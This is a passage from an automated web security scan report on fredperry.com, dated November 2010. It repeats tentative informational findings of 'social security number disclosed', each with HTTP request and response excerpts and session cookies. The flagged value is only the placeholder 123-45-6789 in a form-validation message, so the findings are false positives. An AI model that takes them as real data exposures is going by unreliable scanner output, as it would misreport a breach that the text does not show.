...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.4. http://www.fredperry.com/accessories/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /accessories/

Issue detail

The following social security number was disclosed in the response:

Request

GET /accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:57:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2llo4vpr40icc0o32ncj4vuhi3; expires=Tue, 09-Nov-2010 16:57:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Accesso
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.5. http://www.fredperry.com/accessories/men/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /accessories/men/

Issue detail

The following social security number was disclosed in the response:

Request

GET /accessories/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:57:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=q15klass6oeeripg0sc8i35cs5; expires=Tue, 09-Nov-2010 16:57:16 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's A
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.6. http://www.fredperry.com/accessories/women/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /accessories/women/

Issue detail

The following social security number was disclosed in the response:

Request

GET /accessories/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:57:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uo3jmm7e988hn1037hlvckbdi0; expires=Tue, 09-Nov-2010 16:57:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.7. http://www.fredperry.com/arcade/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /arcade/

Issue detail

The following social security number was disclosed in the response:

Request

GET /arcade/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r2gh5upfm0e7q418tsuq5dtam3; expires=Tue, 09-Nov-2010 17:16:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Arcade
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.8. http://www.fredperry.com/bags/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /bags/

Issue detail

The following social security number was disclosed in the response:

Request

GET /bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sg6vslisl828qekenb2fhsode2; expires=Tue, 09-Nov-2010 17:18:20 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Bags -
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.9. http://www.fredperry.com/bags/men/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /bags/men/

Issue detail

The following social security number was disclosed in the response:

Request

GET /bags/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2pgu55mlppme62s9mtkd6m4c04; expires=Tue, 09-Nov-2010 17:18:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's B
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.10. http://www.fredperry.com/bags/women/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /bags/women/

Issue detail

The following social security number was disclosed in the response:

Request

GET /bags/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9ar0n2bpe45dh7rvf2vqnrn866; expires=Tue, 09-Nov-2010 17:18:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.11. http://www.fredperry.com/checkout/cart/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /checkout/cart/

Issue detail

The following social security number was disclosed in the response:

Request

GET /checkout/cart/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:15:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dogceop16qjgqg80nuf0jem260; expires=Tue, 09-Nov-2010 17:15:26 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.12. http://www.fredperry.com/contacts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /contacts/

Issue detail

The following social security number was disclosed in the response:

Request

GET /contacts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3mj4cdg20qdm247mvjc6pepd07; expires=Tue, 09-Nov-2010 17:14:53 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Fred Per
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.13. http://www.fredperry.com/customercare/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /customercare/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customercare/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1tfuufp4eqg670sli4jn4qs542; expires=Tue, 09-Nov-2010 17:13:41 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.14. http://www.fredperry.com/customercare/delivery/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /customercare/delivery/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customercare/delivery/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lqtjusfje49qs8qfm9b3jvsrd1; expires=Tue, 09-Nov-2010 17:14:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Deliver
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.15. http://www.fredperry.com/customercare/deliverylate/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customercare/deliverylate/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gqo991dbglao1e34i6fhgjt434; expires=Tue, 09-Nov-2010 17:14:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Late De
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.16. http://www.fredperry.com/customercare/faq/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customercare/faq/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9ob37fjg76o97s0kphrvsosup2; expires=Tue, 09-Nov-2010 17:13:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Frequen
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.17. http://www.fredperry.com/customercare/information/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customercare/information/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m40lhjk1892gk3mn4li1ls2sm7; expires=Tue, 09-Nov-2010 17:14:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Customs
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.18. http://www.fredperry.com/customercare/ordertracking/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customercare/ordertracking/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=to8kvlk1fif8g75fn01tesc915; expires=Tue, 09-Nov-2010 17:14:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Order T
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.19. http://www.fredperry.com/customercare/returns/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customercare/returns/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v6rbp3o6tgiot9u6dp0p22ctq4; expires=Tue, 09-Nov-2010 17:14:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
